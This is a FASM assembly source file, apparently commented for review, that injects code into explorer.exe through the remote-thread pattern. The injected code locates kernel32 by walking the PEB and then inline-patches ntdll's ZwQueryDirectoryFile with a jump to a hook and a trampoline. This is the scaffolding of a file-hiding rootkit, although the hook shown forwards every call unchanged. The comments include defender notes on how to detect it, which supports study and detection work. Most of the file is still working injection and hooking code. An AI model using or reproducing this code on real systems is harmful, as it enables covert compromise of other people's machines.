- include 'win32ax.inc'
- .data
- ; Image name of the process Inyectar looks for.  It is compared with
- ; lstrcmp (case-sensitive) against PROCESSENTRY32.szExeFile of every
- ; entry in the process snapshot.
- ProcessName db "explorer.exe",0
- .code
- ;-----------------------------------------------------------------------
- ; Entry point.
- ; Calls Inyectar with: the address of ProcessName, the byte length of the
- ; code span FuncionInyectada..FINFuncion, the address of FuncionInyectada
- ; and the imported GetProcAddress pointer (Inyectar hands that pointer to
- ; the remote thread as its single parameter).
- ; Inyectar returns eax = -1 when no process name matched; any other value
- ; is treated as success and the program exits without output.
- ;-----------------------------------------------------------------------
- start:
- stdcall Inyectar,addr ProcessName,FINFuncion-FuncionInyectada,FuncionInyectada,[GetProcAddress]
- cmp eax,-1
- jne salir
- invoke MessageBoxA,0,"No se encontró el proceso!",0,0 ; user-facing text ("Process not found!") kept as-is
- salir:
- invoke ExitProcess,0
- ;-----------------------------------------------------------------------
- ; Inyectar(ProcessName, Tamaño, Funcion, Datos)          FASM stdcall proc
- ; Copies Tamaño bytes starting at Funcion into the first process whose
- ; image name equals ProcessName, then starts a remote thread at the copy
- ; with Datos as the thread parameter.
- ; Out:  eax = -1 if no process matched, eax = 1 otherwise.
- ; Call sequence (the classic remote-thread injection pattern):
- ;   CreateToolhelp32Snapshot -> Process32Next/lstrcmp loop -> OpenProcess
- ;   -> VirtualAllocEx(RWX) -> WriteProcessMemory -> CreateRemoteThread.
- ; Defender note: every step above is telemetry-visible (remote-thread
- ; creation into explorer.exe, e.g. Sysmon Event ID 8, and a new private
- ; PAGE_EXECUTE_READWRITE region in the target); the RWX region that holds
- ; the copied code is the memory artifact to look for.
- ; The return values of OpenProcess, VirtualAllocEx, WriteProcessMemory and
- ; CreateRemoteThread are never inspected, so 1 is returned even if one of
- ; them failed, and neither hProcess nor the thread handle is ever closed.
- ;-----------------------------------------------------------------------
- proc Inyectar,ProcessName,Tamaño,Funcion,Datos
- locals
- ; Local redefinition of the Win32 PROCESSENTRY32 layout (32-bit field
- ; widths); appears to match the SDK field order -- confirm before reuse.
- struct PROCESSENTRY32
- dwSize dd ?
- cntUsage dd ?
- th32ProcessID dd ?
- th32DefaultHeapID dd ?
- th32ModuleID dd ?
- cntThreads dd ?
- th32ParentProcessID dd ?
- pcPriClassBase dd ?
- dwFlags dd ?
- szExeFile rb MAX_PATH
- ends
- pInfo PROCESSENTRY32 ?          ; snapshot entry being examined
- Handle dd ?                     ; toolhelp snapshot handle
- PID dd ?                        ; PID of the matching process
- DirFuncion dd ?                 ; address of the copy inside the target
- hProcess dd ?                   ; target process handle (never closed)
- endl
- pushad                          ; all GPRs saved; eax is set after popad below
- ; Look up the PID of the process named ProcessName
- invoke CreateToolhelp32Snapshot,0x00000002,0 ; 0x2 = TH32CS_SNAPPROCESS
- mov [Handle],eax
- mov eax,sizeof.PROCESSENTRY32
- mov [pInfo.dwSize], eax        ; dwSize must be set before Process32Next
- BuclePid:
- ; NOTE(review): Process32First is never called; enumeration relies on
- ; Process32Next working directly on a fresh snapshot.
- invoke Process32Next,[Handle],addr pInfo
- cmp eax,0
- je FinProcBuclePID ;no more processes -> not found
- invoke lstrcmp,addr pInfo.szExeFile,[ProcessName] ; case-sensitive compare
- cmp eax,0
- jne BuclePid                    ; no match: next entry
- jmp FinBuclePid                 ; match: leave the loop
- FinProcBuclePID:
- invoke CloseHandle,[Handle]
- popad
- mov eax,-1                      ; not found
- ret
- FinBuclePid:
- invoke CloseHandle,[Handle]
- push [pInfo.th32ProcessID]      ; PID = pInfo.th32ProcessID
- pop [PID]
- ; Open the target process with only the rights needed to write and start a thread
- invoke OpenProcess,PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE,FALSE,[PID]
- mov [hProcess],eax              ; result not checked
- ; Reserve a private RWX region of Tamaño bytes in the target
- invoke VirtualAllocEx,[hProcess],0,[Tamaño],MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
- mov [DirFuncion],eax            ; result not checked
- ; Copy the code into that region (last arg 0: bytes-written count not requested)
- invoke WriteProcessMemory,[hProcess],[DirFuncion],[Funcion],[Tamaño],0
- ; Start a thread at the copy; Datos is passed as the thread parameter
- invoke CreateRemoteThread,[hProcess],0,0,[DirFuncion],[Datos],0,0
- popad
- mov eax,1                       ; reported as success regardless of the calls above
- ret
- endp
- ;-----------------------------------------------------------------------
- ; FuncionInyectada(pGetProcAddress)
- ; Body that Inyectar copies into the target process and runs as a remote
- ; thread.  The only import it receives is pGetProcAddress; everything else
- ; is resolved at run time, and references to its own labels are relocated
- ; through a call/pop delta because the copy lives at an unknown address.
- ; What it does: finds the kernel32 base by walking the PEB loader list,
- ; resolves LoadLibraryA / VirtualProtect / ZwQueryDirectoryFile, makes the
- ; first 5 bytes of ZwQueryDirectoryFile writable, saves them into the
- ; ApiOriginal trampoline and overwrites them with a relative jmp (0xE9)
- ; to FuncionHook.  As written FuncionHook forwards every call unchanged,
- ; so this is only the hooking scaffold -- no filtering is present.
- ; Defender note: the artifact is an inline 0xE9 patch on an ntdll export
- ; inside the target (explorer.exe); comparing the in-memory ntdll .text
- ; against the on-disk image (hook scanning) exposes it, as does the RWX
- ; region the code itself lives in.  The page protection changed by
- ; VirtualProtect is never restored (OriginalProtection is write-only).
- ;-----------------------------------------------------------------------
- proc FuncionInyectada,pGetProcAddress
- locals
- BaseKernel32 dd ?               ; kernel32 image base found via the PEB
- OriginalProtection dd ?         ; old protection returned by VirtualProtect (never read back)
- endl
- ; Read the PEB to obtain the base of KERNEL32.DLL
- ; fs:[0x30] -> PEB, +0x0c -> Ldr, +0x0c -> first module list entry
- ; (standard 32-bit offsets; presumably the in-load-order list -- confirm per OS version)
- mov eax, [fs:030h]
- mov eax, [eax + 0ch]
- mov eax, [eax + 0ch]
- mKERNEL:
- mov eax, [eax]                  ; next list entry
- mov ebx, [eax + 030h]           ; presumably the module base-name buffer (wide chars)
- mov ecx, 00320033h              ; L"32" -- wide chars '3','2'
- cmp ecx, [ebx + 0ch]            ; characters 7..8 of the name == "32" (matches kernel32.dll in any case)
- JNZ mKERNEL                     ; no exit other than a match
- mov eax, [eax + 018h]           ; presumably the DllBase field of the entry
- mov [BaseKernel32],eax
- stdcall [pGetProcAddress],[BaseKernel32],"LoadLibraryA" ; resolve LoadLibraryA
- stdcall eax,"ntdll.dll" ; eax = ntdll.dll base
- stdcall [pGetProcAddress],eax,"ZwQueryDirectoryFile" ; resolve the API to be hooked
- mov ebx,eax                     ; ebx = address of ZwQueryDirectoryFile
- stdcall [pGetProcAddress],[BaseKernel32],"VirtualProtect"
- stdcall eax,ebx,5,PAGE_EXECUTE_READWRITE,addr OriginalProtection ; make its first 5 bytes writable
- ; Compute the delta offset (actual load address - assembled address)
- call delta
- delta:
- pop edx
- sub edx,delta ;edx=delta
- push edx
- add edx,dirFind ; edx = relocated address of dirFind
- mov dword[edx],ebx              ; store the address of ZwQueryDirectoryFile
- pop edx                         ; edx = delta again
- mov ecx,edx
- add ecx,ApiOriginal             ; ecx = relocated address of the trampoline
- mov al,byte[ebx]                ; save byte 0 of the API prologue into the trampoline
- mov byte[ecx],al
- mov byte[ebx],0xE9 ;0xE9 = jmp rel32 opcode written over the API
- inc ebx                         ; ebx = API+1 (rel32 slot)
- inc ecx
- mov eax,dword[ebx]              ; save bytes 1..4 of the prologue into the trampoline
- mov dword[ecx],eax
- mov eax,FuncionHook
- add eax,edx                     ; eax = relocated FuncionHook
- sub eax,ebx
- sub eax,4                       ; rel32 = FuncionHook - (API + 5)
- mov dword[ebx],eax
- add ebx,4                       ; ebx/ecx are not used again before ret
- add ecx,4
- ret                             ; presumably expanded by the proc macro into the epilogue; the thread ends here
- ;--------------------------------------------------------------------------------------------------------------------------------------------
- ; Trampoline: first bytes of the API, then a jump back into the original API.
- ; The first 5 of these nops are overwritten at run time with the saved
- ; prologue bytes.  Assumes those 5 bytes are complete, position-independent
- ; instructions; nothing here verifies that.  Entered with edx = delta
- ; (set by FuncionHook).
- ApiOriginal:
- nop
- nop
- nop
- nop
- nop
- nop
- nop
- add edx,dirFind                 ; edx = relocated address of dirFind
- mov eax,dword[edx] ;eax = saved address of the API
- add eax,5 ;skip the 5 patched bytes
- jmp eax                         ; continue in the original API
- ;--------------------------------------------------------------------------------------------------------------------------------------------
- ; Function the patched API jumps to.  Declared inside FuncionInyectada so
- ; that it falls within the copied range FuncionInyectada..FINFuncion.
- ; Receives the 11 ZwQueryDirectoryFile arguments (stdcall), re-pushes
- ; them in reverse order and calls the ApiOriginal trampoline, so the
- ; original API runs with the same arguments; eax is passed through.
- proc FuncionHook,FileHandle,Event , ApcRoutine, ApcContext, IoStatusBlock, FileInformation, Length,FileInformationClass,ReturnSingleEntry, FileMask ,RestartScan
- call delta2
- delta2:
- pop edx
- sub edx,delta2                  ; edx = delta, consumed by ApiOriginal
- push [RestartScan]
- push [FileMask]
- push [ReturnSingleEntry]
- push [FileInformationClass]
- push [Length]
- push [FileInformation]
- push [IoStatusBlock]
- push [ApcContext]
- push [ApcRoutine]
- push [Event]
- push [FileHandle]
- mov ecx,edx
- add ecx,ApiOriginal             ; ecx = relocated trampoline
- call ecx ; NtQueryDirectoryFile (via trampoline)
- ret                             ; presumably expanded by the proc macro into the stdcall epilogue
- endp
- ;-------------------------------------------------------------------------------------------------------------------------------------------
- dirFind dd ?                    ; absolute address of the hooked API, filled in above and read by ApiOriginal
- endp
- ; End of the byte range copied into the target
- ; (size = FINFuncion - FuncionInyectada, computed at the call in start).
- FINFuncion:
- .end start